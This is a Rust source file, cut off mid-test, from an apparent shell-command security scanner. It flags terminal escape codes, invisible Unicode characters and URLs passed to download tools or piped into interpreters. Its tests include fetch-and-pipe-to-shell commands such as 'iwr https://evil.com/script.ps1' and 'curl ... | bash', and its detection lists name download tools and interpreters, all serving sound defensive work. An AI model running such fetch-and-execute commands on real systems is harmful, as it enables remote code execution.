use once_cell::sync::Lazy;
use regex::Regex;
use crate::parse::{self, UrlLike};
use crate::tokenize::{self, Segment, ShellType};
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
Exec,
Paste,
FileScan,
}
#[allow(dead_code)]
mod tier1_generated {
include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
pub fn extractor_ids() -> &'static [&'static str] {
tier1_generated::EXTRACTOR_IDS
}
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
Regex::new(
r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
)
.expect("url regex must compile")
});
pub struct ByteScanResult {
pub has_ansi_escapes: bool,
pub has_control_chars: bool,
pub has_bidi_controls: bool,
pub has_zero_width: bool,
pub has_invalid_utf8: bool,
pub has_unicode_tags: bool,
pub has_variation_selectors: bool,
pub has_invisible_math_operators: bool,
pub has_invisible_whitespace: bool,
pub details: Vec<ByteFinding>,
}
pub struct ByteFinding {
pub offset: usize,
pub byte: u8,
pub codepoint: Option<u32>,
pub description: String,
}
pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
match context {
ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
ScanContext::FileScan => true,
}
}
pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
let mut result = ByteScanResult {
has_ansi_escapes: false,
has_control_chars: false,
has_bidi_controls: false,
has_zero_width: false,
has_invalid_utf8: false,
has_unicode_tags: false,
has_variation_selectors: false,
has_invisible_math_operators: false,
has_invisible_whitespace: false,
details: Vec::new(),
};
if std::str::from_utf8(input).is_err() {
result.has_invalid_utf8 = true;
}
let len = input.len();
let mut i = 0;
while i < len {
let b = input[i];
if b == 0x1b {
if i + 1 < len {
let next = input[i + 1];
if next == b'[' || next == b']' || next == b'_' || next == b'P' {
result.has_ansi_escapes = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: match next {
b'[' => "CSI escape sequence",
b']' => "OSC escape sequence",
b'_' => "APC escape sequence",
b'P' => "DCS escape sequence",
_ => "escape sequence",
}
.to_string(),
});
i += 2;
continue;
}
} else {
result.has_ansi_escapes = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: "trailing escape byte".to_string(),
});
}
}
if b == b'\r' {
let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
if is_attack_cr {
result.has_control_chars = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: format!("control character 0x{b:02x}"),
});
}
} else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
result.has_control_chars = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: format!("control character 0x{b:02x}"),
});
}
if b == 0x7F {
result.has_control_chars = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: "control character 0x7f (DEL)".to_string(),
});
}
if b >= 0xc0 {
let remaining = &input[i..];
if let Some(ch) = std::str::from_utf8(remaining)
.ok()
.or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
.and_then(|s| s.chars().next())
{
if is_bidi_control(ch) {
result.has_bidi_controls = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("bidi control U+{:04X}", ch as u32),
});
}
if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
result.has_zero_width = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("zero-width character U+{:04X}", ch as u32),
});
}
if is_unicode_tag(ch) {
result.has_unicode_tags = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("unicode tag U+{:04X}", ch as u32),
});
}
if is_variation_selector(ch) {
result.has_variation_selectors = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("variation selector U+{:04X}", ch as u32),
});
}
if is_invisible_math_operator(ch) {
result.has_invisible_math_operators = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("invisible math operator U+{:04X}", ch as u32),
});
}
if is_invisible_whitespace(ch) {
result.has_invisible_whitespace = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("invisible whitespace U+{:04X}", ch as u32),
});
}
i += ch.len_utf8();
continue;
}
}
i += 1;
}
result
}
fn is_bidi_control(ch: char) -> bool {
matches!(
ch,
'\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
}
fn is_zero_width(ch: char) -> bool {
matches!(
ch,
'\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' | '\u{034F}' | '\u{00AD}' | '\u{2060}' )
}
fn is_unicode_tag(ch: char) -> bool {
('\u{E0000}'..='\u{E007F}').contains(&ch)
}
fn is_variation_selector(ch: char) -> bool {
('\u{FE00}'..='\u{FE0F}').contains(&ch)
|| ('\u{E0100}'..='\u{E01EF}').contains(&ch)
}
fn is_invisible_math_operator(ch: char) -> bool {
('\u{2061}'..='\u{2064}').contains(&ch)
}
fn is_invisible_whitespace(ch: char) -> bool {
matches!(
ch,
'\u{200A}' | '\u{2009}' | '\u{202F}' )
}
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
let segments = tokenize::tokenize(input, shell);
let mut results = Vec::new();
for (seg_idx, segment) in segments.iter().enumerate() {
let sink_context = is_sink_context(segment, &segments);
let resolved = resolve_segment_command(segment);
let mut url_sources: Vec<&str> = Vec::new();
if let Some(ref cmd) = segment.command {
url_sources.push(cmd.as_str());
}
for arg in &segment.args {
url_sources.push(arg.as_str());
}
for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
if ignores_env_assignment_url(&name) {
continue;
}
let clean = strip_quotes(&value);
if !clean.is_empty() {
push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
}
}
for source in &url_sources {
push_urls_from_source(source, seg_idx, sink_context, &mut results);
}
let is_docker_cmd = resolved
.as_ref()
.is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
if sink_context && !is_docker_cmd {
if let Some(cmd) = resolved.as_ref() {
for (arg_idx, arg) in cmd.args.iter().enumerate() {
if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
continue;
}
let clean = strip_quotes(arg);
if is_remote_copy_target(&cmd.name, &clean) {
continue;
}
if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
results.push(ExtractedUrl {
raw: clean.clone(),
parsed: UrlLike::SchemelessHostPath {
host: extract_host_from_schemeless(&clean),
path: extract_path_from_schemeless(&clean),
},
segment_index: seg_idx,
in_sink_context: true,
});
}
}
}
}
if let Some(cmd) = resolved.as_ref() {
if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
if let Some(docker_subcmd) = cmd.args.first() {
let subcmd_lower = docker_subcmd.to_lowercase();
if subcmd_lower == "build" {
let mut i = 1;
while i < cmd.args.len() {
let arg = strip_quotes(&cmd.args[i]);
if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
let tag_val = strip_quotes(&cmd.args[i + 1]);
if !tag_val.is_empty() {
let docker_url = parse::parse_docker_ref(&tag_val);
results.push(ExtractedUrl {
raw: tag_val,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
}
i += 2;
} else if arg.starts_with("-t") && arg.len() > 2 {
let tag_val = strip_quotes(&arg[2..]);
let docker_url = parse::parse_docker_ref(&tag_val);
results.push(ExtractedUrl {
raw: tag_val,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
i += 1;
} else if let Some(val) = arg.strip_prefix("--tag=") {
let tag_val = strip_quotes(val);
let docker_url = parse::parse_docker_ref(&tag_val);
results.push(ExtractedUrl {
raw: tag_val,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
i += 1;
} else {
i += 1;
}
}
} else if subcmd_lower == "image" {
if let Some(image_subcmd) = cmd.args.get(1) {
let image_subcmd_lower = image_subcmd.to_lowercase();
if matches!(
image_subcmd_lower.as_str(),
"pull" | "push" | "inspect" | "rm" | "tag"
) {
extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
}
}
} else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
}
}
}
}
}
results
}
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
pub raw: String,
pub parsed: UrlLike,
pub segment_index: usize,
pub in_sink_context: bool,
}
const DOCKER_VALUE_FLAGS: &[&str] = &[
"--platform",
"--format",
"--filter",
"-f",
"--label",
"-l",
"--name",
"--hostname",
"--user",
"-u",
"--workdir",
"-w",
"--network",
"--net",
"--env",
"-e",
"--env-file",
"--publish",
"-p",
"--expose",
"--volume",
"-v",
"--mount",
"--add-host",
"--device",
"--entrypoint",
"--log-driver",
"--log-opt",
"--restart",
"--runtime",
"--cpus",
"--cpu-shares",
"--cpu-quota",
"--memory",
"--memory-reservation",
"--memory-swap",
"--shm-size",
"--ulimit",
"--security-opt",
"--sysctl",
"--tmpfs",
"--gpus",
"--ipc",
"--pid",
"--userns",
"--cgroupns",
];
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
let mut skip_next = false;
let mut end_of_options = false;
for arg in args {
if skip_next {
skip_next = false;
continue;
}
let clean = strip_quotes(arg);
if clean == "--" {
end_of_options = true;
continue;
}
if !end_of_options && clean.starts_with("--") && clean.contains('=') {
continue; }
if !end_of_options && clean.starts_with('-') {
if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
skip_next = true;
}
if DOCKER_VALUE_PREFIXES
.iter()
.any(|p| clean.starts_with(p) && clean.len() > p.len())
{
continue;
}
continue;
}
if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
let docker_url = parse::parse_docker_ref(&clean);
results.push(ExtractedUrl {
raw: clean,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
}
break; }
}
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
name: String,
args: &'a [String],
}
fn push_urls_from_source(
source: &str,
segment_index: usize,
in_sink_context: bool,
results: &mut Vec<ExtractedUrl>,
) {
for mat in URL_REGEX.find_iter(source) {
let raw = mat.as_str().to_string();
let url = parse::parse_url(&raw);
results.push(ExtractedUrl {
raw,
parsed: url,
segment_index,
in_sink_context,
});
}
}
fn ignores_env_assignment_url(name: &str) -> bool {
let upper = name.to_ascii_uppercase();
upper == "NO_PROXY" || upper.ends_with("_PROXY")
}
fn env_long_flag_takes_value(flag: &str) -> bool {
let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
matches!(name, "--unset" | "--chdir" | "--split-string")
}
fn command_base_name(raw: &str) -> String {
let clean = strip_quotes(raw);
clean
.rsplit(['/', '\\'])
.next()
.unwrap_or(clean.as_str())
.to_lowercase()
}
fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
let command = segment.command.as_ref()?;
resolve_named_command(command, &segment.args)
}
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
let name = command_base_name(command);
match name.as_str() {
"env" => resolve_env_command(args),
"command" => resolve_command_wrapper(args),
"time" => resolve_time_wrapper(args),
"tirith" => resolve_tirith_command(args),
_ => Some(ResolvedCommand { name, args }),
}
}
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
let mut i = 0;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if clean == "--" {
i += 1;
break;
}
if tokenize::is_env_assignment(&clean) {
i += 1;
continue;
}
if clean.starts_with('-') {
if clean.starts_with("--") {
if env_long_flag_takes_value(&clean) && !clean.contains('=') {
i += 2;
} else {
i += 1;
}
continue;
}
if clean == "-u" || clean == "-C" || clean == "-S" {
i += 2;
continue;
}
i += 1;
continue;
}
return resolve_named_command(&clean, &args[i + 1..]);
}
while i < args.len() {
let clean = strip_quotes(&args[i]);
if tokenize::is_env_assignment(&clean) {
i += 1;
continue;
}
return resolve_named_command(&clean, &args[i + 1..]);
}
None
}
fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
let mut i = 0;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if clean == "--" {
i += 1;
break;
}
if clean.starts_with('-') {
i += 1;
continue;
}
break;
}
args.get(i)
.and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
}
fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
let mut i = 0;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if clean == "--" {
i += 1;
break;
}
if clean.starts_with('-') {
if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
i += 2;
} else {
i += 1;
}
continue;
}
break;
}
args.get(i)
.and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
}
fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
let subcommand = args.first().map(|arg| command_base_name(arg))?;
match subcommand.as_str() {
"run" => Some(ResolvedCommand {
name: "tirith-run".to_string(),
args: &args[1..],
}),
_ => Some(ResolvedCommand {
name: "tirith".to_string(),
args,
}),
}
}
fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
if let Some(cmd) = resolve_segment_command(segment) {
let cmd_lower = cmd.name;
if cmd_lower == "git" {
return is_git_sink(cmd.args);
}
if is_source_command(&cmd_lower) {
return true;
}
}
if let Some(sep) = &segment.preceding_separator {
if sep == "|" || sep == "|&" {
if let Some(cmd) = resolve_segment_command(segment) {
if is_interpreter(&cmd.name) {
return true;
}
}
}
}
false
}
fn is_source_command(cmd: &str) -> bool {
matches!(
cmd,
"curl"
| "wget"
| "http"
| "https"
| "xh"
| "fetch"
| "scp"
| "rsync"
| "docker"
| "podman"
| "nerdctl"
| "pip"
| "pip3"
| "npm"
| "npx"
| "yarn"
| "pnpm"
| "go"
| "cargo"
| "iwr"
| "irm"
| "invoke-webrequest"
| "invoke-restmethod"
| "tirith-run"
)
}
fn is_remote_copy_target(cmd: &str, arg: &str) -> bool {
if !matches!(cmd, "scp" | "rsync") {
return false;
}
if let Some(at_pos) = arg.find('@') {
let before_at = &arg[..at_pos];
let after_at = &arg[at_pos + 1..];
return !before_at.contains(':') && !after_at.contains('/') && !after_at.contains(':');
}
false
}
fn is_git_sink(args: &[String]) -> bool {
if args.is_empty() {
return false;
}
for arg in args {
let clean = strip_quotes(arg);
if clean.starts_with('-') {
continue;
}
return matches!(
clean.as_str(),
"clone" | "fetch" | "pull" | "submodule" | "remote"
);
}
false
}
fn is_interpreter(cmd: &str) -> bool {
matches!(
cmd,
"sh" | "bash"
| "zsh"
| "dash"
| "ksh"
| "python"
| "python3"
| "node"
| "perl"
| "ruby"
| "php"
| "iex"
| "invoke-expression"
)
}
fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
let cmd_lower = cmd.to_lowercase();
let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
match cmd_base {
"curl" => {
if arg_index > 0 {
let prev = strip_quotes(&args[arg_index - 1]);
if prev == "-o"
|| prev == "--output"
|| prev == "-u"
|| prev == "--user"
|| prev == "-U"
|| prev == "--proxy-user"
{
return true;
}
}
let current = strip_quotes(&args[arg_index]);
if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
return true;
}
if current.starts_with("--output=")
|| current.starts_with("--user=")
|| current.starts_with("--proxy-user=")
{
return true;
}
false
}
"wget" => {
if arg_index > 0 {
let prev = strip_quotes(&args[arg_index - 1]);
if prev == "-O"
|| prev == "--output-document"
|| prev == "--user"
|| prev == "--password"
|| prev == "--http-user"
|| prev == "--http-password"
|| prev == "--ftp-user"
|| prev == "--ftp-password"
|| prev == "--proxy-user"
|| prev == "--proxy-password"
{
return true;
}
}
let current = strip_quotes(&args[arg_index]);
if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
return true;
}
if current.starts_with("--output-document=")
|| current.starts_with("--user=")
|| current.starts_with("--password=")
|| current.starts_with("--http-user=")
|| current.starts_with("--http-password=")
|| current.starts_with("--ftp-user=")
|| current.starts_with("--ftp-password=")
|| current.starts_with("--proxy-user=")
|| current.starts_with("--proxy-password=")
{
return true;
}
false
}
"http" | "https" | "xh" => {
if arg_index > 0 {
let prev = strip_quotes(&args[arg_index - 1]);
if prev == "-a" || prev == "--auth" {
return true;
}
}
let current = strip_quotes(&args[arg_index]);
if current.starts_with("--auth=") {
return true;
}
false
}
_ => false,
}
}
fn strip_quotes(s: &str) -> String {
let s = s.trim();
if s.len() >= 2
&& ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
{
s[1..s.len() - 1].to_string()
} else {
s.to_string()
}
}
fn looks_like_schemeless_host(s: &str) -> bool {
if s.starts_with('-') || !s.contains('.') {
return false;
}
if s.starts_with('.') {
return false;
}
let host_part = s.split('/').next().unwrap_or(s);
if !host_part.contains('.') || host_part.contains(' ') {
return false;
}
let host_lower = host_part.to_lowercase();
let has_meaningful_path = s.find('/').is_some_and(|idx| {
let after_slash = &s[idx + 1..];
!after_slash.is_empty() && after_slash != "/"
});
if !has_meaningful_path {
let file_exts = [
".sh",
".py",
".rb",
".js",
".ts",
".go",
".rs",
".c",
".h",
".txt",
".md",
".json",
".yaml",
".yml",
".xml",
".html",
".css",
".tar.gz",
".tar.bz2",
".tar.xz",
".tgz",
".zip",
".gz",
".bz2",
".rpm",
".deb",
".pkg",
".dmg",
".exe",
".msi",
".dll",
".so",
".log",
".conf",
".cfg",
".ini",
".toml",
".png",
".jpg",
".jpeg",
".gif",
".bmp",
".ico",
".tiff",
".tif",
".pdf",
".csv",
".mp3",
".mp4",
".wav",
".avi",
".mkv",
".flac",
".ogg",
".webm",
".ttf",
".otf",
".woff",
".woff2",
".docx",
".xlsx",
".pptx",
".sqlite",
".lock",
".example",
".local",
".bak",
".tmp",
".swp",
".orig",
".patch",
".diff",
".map",
".env",
".sample",
".dist",
".editorconfig",
];
if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
return false;
}
}
let labels: Vec<&str> = host_part.split('.').collect();
if labels.len() < 2 {
return false;
}
let tld = labels.last().unwrap();
tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
}
fn extract_host_from_schemeless(s: &str) -> String {
s.split('/').next().unwrap_or(s).to_string()
}
fn extract_path_from_schemeless(s: &str) -> String {
if let Some(idx) = s.find('/') {
s[idx..].to_string()
} else {
String::new()
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_tier1_exec_matches_url() {
assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_no_match_simple() {
assert!(!tier1_scan("ls -la", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_no_match_echo() {
assert!(!tier1_scan("echo hello world", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_bash() {
assert!(tier1_scan("something | bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_sudo_bash() {
assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_env_bash() {
assert!(tier1_scan("something | env bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_bin_bash() {
assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_git_scp() {
assert!(tier1_scan(
"git clone git@github.com:user/repo",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_punycode() {
assert!(tier1_scan(
"curl https://xn--example-cua.com",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_docker() {
assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_iwr() {
assert!(tier1_scan(
"iwr https://evil.com/script.ps1",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_curl() {
assert!(tier1_scan(
"curl https://example.com/install.sh",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_lookalike_tld() {
assert!(tier1_scan("open file.zip", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_shortener() {
assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
}
#[test]
fn test_tier1_paste_matches_non_ascii() {
assert!(tier1_scan("café", ScanContext::Paste));
}
#[test]
fn test_tier1_paste_exec_patterns_also_match() {
assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
}
#[test]
fn test_tier1_exec_no_non_ascii() {
assert!(!tier1_scan("echo café", ScanContext::Exec));
}
#[test]
fn test_byte_scan_ansi() {
let input = b"hello \x1b[31mred\x1b[0m world";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
}
#[test]
fn test_byte_scan_control_chars() {
let input = b"hello\rworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
}
#[test]
fn test_byte_scan_bidi() {
let input = "hello\u{202E}dlrow".as_bytes();
let result = scan_bytes(input);
assert!(result.has_bidi_controls);
}
#[test]
fn test_byte_scan_zero_width() {
let input = "hel\u{200B}lo".as_bytes();
let result = scan_bytes(input);
assert!(result.has_zero_width);
}
#[test]
fn test_byte_scan_clean() {
let input = b"hello world\n";
let result = scan_bytes(input);
assert!(!result.has_ansi_escapes);
assert!(!result.has_control_chars);
assert!(!result.has_bidi_controls);
assert!(!result.has_zero_width);
}
#[test]
fn test_extract_urls_basic() {
let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
assert_eq!(urls.len(), 1);
assert_eq!(urls[0].raw, "https://example.com/install.sh");
}
#[test]
fn test_extract_urls_from_leading_env_assignment() {
let urls = extract_urls(
"PAYLOAD_URL=https://example.com/install.sh curl ok",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
"leading env assignment URL should be extracted in sink context"
);
}
#[test]
fn test_extract_urls_from_quoted_leading_env_assignment() {
let urls = extract_urls(
"PAYLOAD_URL='https://example.com/install.sh' curl ok",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "https://example.com/install.sh"),
"quoted leading env assignment URL should be extracted"
);
}
#[test]
fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
let urls = extract_urls(
"HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
ShellType::Posix,
);
assert!(
!urls.iter().any(|u| u.raw == "http://proxy:8080"),
"proxy configuration URLs should not be treated as destinations"
);
}
#[test]
fn test_extract_urls_pipe() {
let urls = extract_urls(
"curl https://example.com/install.sh | bash",
ShellType::Posix,
);
assert!(!urls.is_empty());
assert!(urls[0].in_sink_context);
}
#[test]
fn test_extract_urls_scp() {
let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
assert!(!urls.is_empty());
assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
}
#[test]
fn test_extract_docker_ref() {
let urls = extract_urls("docker pull nginx", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
}
#[test]
fn test_extract_powershell_iwr() {
let urls = extract_urls(
"iwr https://example.com/script.ps1 | iex",
ShellType::PowerShell,
);
assert!(!urls.is_empty());
}
#[test]
fn test_wrapper_preserves_sink_context() {
let urls = extract_urls(
"env --ignore-environment curl http://example.com",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"wrapped sink commands should keep sink context"
);
}
#[test]
fn test_env_wrapper_preserves_tirith_run_sink_context() {
let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"env wrapper should preserve tirith run sink context"
);
}
#[test]
fn test_command_wrapper_preserves_tirith_run_sink_context() {
let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"command wrapper should preserve tirith run sink context"
);
}
#[test]
fn test_time_wrapper_preserves_tirith_run_sink_context() {
let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"time wrapper should preserve tirith run sink context"
);
}
#[test]
fn test_strip_quotes_single_char() {
assert_eq!(strip_quotes("\""), "\"");
assert_eq!(strip_quotes("'"), "'");
}
#[test]
fn test_strip_quotes_empty() {
assert_eq!(strip_quotes(""), "");
}
#[test]
fn test_scan_bytes_bel_vt_del() {
let input = b"hello\x07world";
let result = scan_bytes(input);
assert!(result.has_control_chars);
let input = b"hello\x0Bworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
let input = b"hello\x0Cworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
let input = b"hello\x7Fworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
}
#[test]
fn test_scan_bytes_osc_apc_dcs() {
let input = b"hello\x1b]0;title\x07world";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
let input = b"hello\x1b_dataworld";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
let input = b"hello\x1bPdataworld";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
}
#[test]
fn test_schemeless_long_tld() {
assert!(looks_like_schemeless_host("example.academy"));
assert!(looks_like_schemeless_host("example.photography"));
}
#[test]
fn test_segment_index_correct() {
let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
for url in &urls {
assert!(url.segment_index <= 1);
}
}
#[test]
fn test_docker_build_context_not_image() {
let urls = extract_urls("docker build .", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(
docker_urls.len(),
0,
"build context '.' should not be treated as image"
);
}
#[test]
fn test_docker_image_subcmd() {
let urls = extract_urls("docker image pull nginx", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
}
#[test]
fn test_docker_run_image_after_double_dash() {
let urls = extract_urls(
"docker run --rm -- evil.registry/ns/img:1",
ShellType::Posix,
);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
}
#[test]
fn test_tier1_module_boundary_enforcement() {
let ids = tier1_generated::EXTRACTOR_IDS;
assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
assert!(exec_count > 0, "Must have exec fragments");
assert!(
paste_count >= exec_count,
"Paste fragments must be superset of exec fragments"
);
Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
.expect("Generated exec pattern must be valid regex");
Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
.expect("Generated paste pattern must be valid regex");
}
#[test]
fn test_scan_bytes_trailing_cr_not_flagged() {
let result = scan_bytes(b"/path\r");
assert!(
!result.has_control_chars,
"trailing \\r should not be flagged"
);
}
#[test]
fn test_scan_bytes_trailing_crlf_not_flagged() {
let result = scan_bytes(b"/path\r\n");
assert!(
!result.has_control_chars,
"trailing \\r\\n should not be flagged"
);
}
#[test]
fn test_scan_bytes_windows_multiline_not_flagged() {
let result = scan_bytes(b"line1\r\nline2\r\n");
assert!(
!result.has_control_chars,
"Windows \\r\\n line endings should not be flagged"
);
}
#[test]
fn test_scan_bytes_embedded_cr_still_flagged() {
let result = scan_bytes(b"safe\rmalicious");
assert!(
result.has_control_chars,
"embedded \\r before non-\\n should be flagged"
);
}
#[test]
fn test_scan_bytes_mixed_crlf_and_attack_cr() {
let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
assert!(
result.has_control_chars,
"attack \\r mixed with \\r\\n should be flagged"
);
}
#[test]
fn test_scan_bytes_only_cr() {
let result = scan_bytes(b"\r");
assert!(
!result.has_control_chars,
"lone trailing \\r should not be flagged"
);
}
#[test]
fn test_schemeless_skip_curl_output_flag() {
let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"lenna.png should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_skip_curl_output_combined() {
let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"-olenna.png should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_skip_wget_output_flag() {
let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
